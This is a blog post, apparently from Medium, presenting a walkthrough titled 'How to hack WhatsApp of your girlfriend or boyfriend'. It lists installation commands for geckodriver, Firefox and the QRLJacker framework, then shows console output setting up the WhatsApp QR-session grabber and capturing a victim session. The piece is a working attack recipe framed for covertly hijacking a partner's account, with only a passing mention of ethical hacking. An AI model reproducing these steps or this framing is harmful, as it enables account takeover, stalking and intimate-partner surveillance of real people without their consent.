How to hack WhatsApp of your girlfriend or boyfriend

  • For testing we have used Live Kali Linux 2019.4 amd64. While testing QrlJacker sometimes, QRLJacker was not working on installed versions of Kali linux. We have tested onLive boot of Kali Linux 2018.4, 2018.3 & 2019.1 amd64.
  • Geeko driver act as web browser engine used in applications developed by Mozilla. It creates an link between Selenium (an python module) & Mozilla browser. For installing type wget https://github.com/mozilla/geckodriver/releases/download/v0.24.0/geckodriver-v0.24.0-linux64.tar.gz
  • Type tar -xvzf geckodriver-v0.24.0-linux64.tar.gz and change directory to extracted one.
  • Type sudo mv -f geckodriver /usr/local/share/geckodriver
  • Type sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
  • Type sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver
  • Remember to update firefox browser. For that type sudo apt-get update & sudo apt-get install firefox-esr
  • Type apt-get install python3.7
  • Type git clone https://github.com/OWASP/QRLJacking
  • Type python3.7 -m pip install -r requirements.txt
  • Type python3.7 QrlJacker.py
_____________________________________ !\/ ! \/ ./ !/\ ! |\ ./ ! \ ! / \ ./ ! \______!______| \ ,/ ! /\ ! ./\ ,/ ! / \ ! | \ ,/ !/ \___!____| ,/ Everything is connected, even the simplest things! ! / \ _!__ *\,/ ! ! \ ! \,/ ! ! | \! ,/ !----------K/ ! ! ,! /| QrlJacker-Framework By @D4Vinci - V2.1 ! !/ / | Attack vector By Mohamed Abdelbasset Elnouby (@SymbianSyMoh) ! / \ / | Loaded 1 grabber(s), 0 post module(s). !\./ \/ | !/\ / | ! \ / .o. ! \/ :O: ! / " ! / ! / !/ ! ! !QrlJacker >helpGeneral commands ================= Command Description --------- ------------- help/? Show this help menu. os <command> Execute a system command without closing the framework banner Display banner. exit/quit Exit the framework. Core commands ============= Command Description --------- ------------- database Prints the core version, check if framework is up-to-date and update if you are not up-to-date. debug Drop into debug mode or disable it. (Making identifying problems easier) dev Drop into development mode or disable it. (Reload modules every use) verbose Drop into verbose mode or disable it. (Make framework displays more details) reload/refresh Reload the modules database.QrlJacker >list
Name Description
grabber/whatsapp Whatsapp QR-sessions grabber and controller
QrlJacker > use grabber/whatsapp
QrlJacker Module(grabber/whatsapp) >set port 1337
[+] port => 1337
QrlJacker Module(grabber/whatsapp) > set host 192.168.1.7
[+] host => 192.168.1.7
QrlJacker Module(grabber/whatsapp) > options
Name Current value Required Description
port 1337 Yes The local port to listen on.
host 192.168.1.7 Yes The local host to listen on.
useragent (default) Yes Make useragent is the (default) one, a (random) generated useragent or a specifed useragent
QrlJacker Module(grabber/whatsapp) >runQrlJacker Module(grabber/whatsapp) > run
[+] Using the default useragent
[+] Running a thread to keep the QR image [whatsapp]
[+] Waiting for sessions on whatsapp
[+] Running a thread to detect Idle once it happens then click the QR reload button [whatsapp]
[+] Initializing webserver... [whatsapp]
QrlJacker Module(grabber/whatsapp) >sessions
ID Module name Captured on
0 whatsapp Sat-Apr-13-04:53:03-2019

Practical Video on QrlJacking :-

Above video is posted by a ethical hacking student of International Institute of Cyber Security, Delhi India. In Next publish we will analyse how QRLJacker works

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store